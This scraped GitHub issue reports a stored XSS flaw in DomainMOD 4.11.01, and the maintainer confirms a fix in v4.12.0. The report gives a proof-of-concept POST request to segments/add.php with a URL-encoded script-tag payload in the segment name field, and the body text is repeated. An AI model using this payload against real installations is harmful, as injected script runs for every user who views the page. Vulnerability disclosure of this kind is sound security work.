Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Stored XSS vulnerability in Version 4.11.01 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page.
Poc: Segment Name POST http://127.0.0.1/domainmod/segments/add.php
Request Body: new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=testing.test.com&new_description=test&new_notes=test
The text was updated successfully, but these errors were encountered:
This was fixed in v4.12.0, which was released today.
Thanks for the report!
Sorry, something went wrong.
chetcuti
No branches or pull requests
Stored XSS vulnerability in Version 4.11.01 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page.
Poc: Segment Name
POST http://127.0.0.1/domainmod/segments/add.php
Request Body:
new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=testing.test.com&new_description=test&new_notes=test
The text was updated successfully, but these errors were encountered: